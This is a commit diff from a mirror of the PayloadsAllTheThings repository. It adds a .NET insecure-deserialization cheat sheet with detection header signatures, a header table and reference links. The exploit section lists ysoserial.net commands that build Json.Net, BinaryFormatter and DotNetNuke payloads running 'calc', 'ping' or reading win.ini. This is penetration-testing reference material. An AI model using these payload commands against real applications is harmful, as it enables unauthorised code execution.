mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
.NET Deserialization
This commit is contained in:
parent
3392980207
commit
d88e32aaae
3 changed files with 69 additions and 3 deletions
48
Insecure Deserialization/DotNET.md
Normal file
48
Insecure Deserialization/DotNET.md
Normal file
|
@ -0,0 +1,48 @@
|
|||
# .NET Serialization
|
||||
|
||||
## Summary
|
||||
|
||||
* [Detection](#detection)
|
||||
* [Exploit](#exploit)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Detection
|
||||
|
||||
* `AAEAAD` (Hex) = .NET deserialization BinaryFormatter
|
||||
* `FF01` (Hex) / `/w` (Base64) = .NET ViewState
|
||||
|
||||
Example: `AAEAAAD/////AQAAAAAAAAAMAgAAAF9TeXN0ZW0u[...]0KPC9PYmpzPgs=`
|
||||
|
||||
|
||||
## Exploit
|
||||
|
||||
* [pwntester/ysoserial.net - Deserialization payload generator for a variety of .NET formatters](https://github.com/pwntester/ysoserial.net)
|
||||
```ps1
|
||||
$ cat my_long_cmd.txt | ysoserial.exe -o raw -g WindowsIdentity -f Json.Net -s
|
||||
$ ./ysoserial.exe -p DotNetNuke -m read_file -f win.ini
|
||||
$ ./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t
|
||||
$ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t
|
||||
```
|
||||
|
||||
### JSON.NET
|
||||
|
||||
```ps1
|
||||
./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "ping 10.10.10.10" -t
|
||||
```
|
||||
|
||||
### BinaryFormatter
|
||||
|
||||
> The BinaryFormatter type is dangerous and is not recommended for data processing. Applications should stop using BinaryFormatter as soon as possible, even if they believe the data they’re processing to be trustworthy. BinaryFormatter is insecure and can’t be made secure.
|
||||
|
||||
|
||||
```ps1
|
||||
./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "ping 10.10.10.10" -t
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Attacking .NET deserialization - Alvaro Muñoz - 28 avr. 2018](https://youtu.be/eDfGpu3iE4Q)
|
||||
* [Now You Serial, Now You Don't - Systematically Hunting for Deserialization Exploits - ALYSSA RAHMANDEC](https://www.mandiant.com/resources/blog/hunting-deserialization-exploits)
|
||||
* [Exploiting Deserialisation in ASP.NET via ViewState - Soroush Dalili (@irsdl) - 04/2019](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
|
|
@ -9,6 +9,15 @@ Check the following sub-sections, located in other files :
|
|||
* [Ruby : universal rce gadget, ...](Ruby.md)
|
||||
* [Python : pickle, ...](Python.md)
|
||||
* [YAML : PyYAML, ...](YAML.md)
|
||||
* [.NET : ysoserial.net, ...](DotNET.md)
|
||||
|
||||
| Object Type | Header (Hex) | Header (Base64) |
|
||||
|-----------------|--------------|-----------------|
|
||||
| Java Serialized | AC ED | rO |
|
||||
| .NET ViewState | FF 01 | /w |
|
||||
| Python Pickle | 80 04 95 | gASV |
|
||||
| PHP Serialized | 4F 3A | Tz |
|
||||
|
||||
|
||||
## LABS
|
||||
|
||||
|
@ -16,8 +25,8 @@ Check the following sub-sections, located in other files :
|
|||
|
||||
## References
|
||||
|
||||
* [Github - ysoserial](https://github.com/frohoff/ysoserial)
|
||||
* [Github - ysoserial.net](https://github.com/pwntester/ysoserial.net)
|
||||
* [Github - frohoff/ysoserial](https://github.com/frohoff/ysoserial)
|
||||
* [Github - pwntester/ysoserial.net](https://github.com/pwntester/ysoserial.net)
|
||||
* [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
|
||||
* [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
|
||||
* [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
|
||||
|
@ -33,4 +42,5 @@ Check the following sub-sections, located in other files :
|
|||
* [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals
|
||||
* [Diving into unserialize() - Sep 19- Vickie Li](https://medium.com/swlh/diving-into-unserialize-3586c1ec97e)
|
||||
* [.NET Gadgets](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf) by Alvaro Muñoz (@pwntester) & OleksandrMirosh
|
||||
* [ExploitDB Introduction](https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf)
|
||||
* [ExploitDB Introduction](https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf)
|
||||
* [Exploiting insecure deserialization vulnerabilities - PortSwigger](https://portswigger.net/web-security/deserialization/exploiting)
|
|
@ -19,6 +19,14 @@
|
|||
- [stacksmashing / Ghidra Ninja](https://www.youtube.com/channel/UC3S8vxwRfqLBdIhgRlDRVzw)
|
||||
- [Hak5](https://www.youtube.com/channel/UC3s0BtrBJpwNDaflRSoiieQ)
|
||||
|
||||
- [HACKING GOOGLE Series](https://www.youtube.com/watch?v=aOGFY1R4QQ4)
|
||||
- [EP000: Operation Aurora | HACKING GOOGLE](https://youtu.be/przDcQe6n5o)
|
||||
- [EP001: Threat Analysis Group | HACKING GOOGLE](https://youtu.be/N7N4EC20-cM)
|
||||
- [EP002: Detection and Response | HACKING GOOGLE](https://youtu.be/QZ0cpBocl3c)
|
||||
- [EP003: Red Team | HACKING GOOGLE](https://youtu.be/TusQWn2TQxQ)
|
||||
- [EP004: Bug Hunters | HACKING GOOGLE](https://youtu.be/IoXiXlCNoXg)
|
||||
- [EP005: Project Zero | HACKING GOOGLE](https://youtu.be/My_13FXODdU)
|
||||
|
||||
## Conferences
|
||||
|
||||
- [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)
|
||||
|
|
Loading…
Reference in a new issue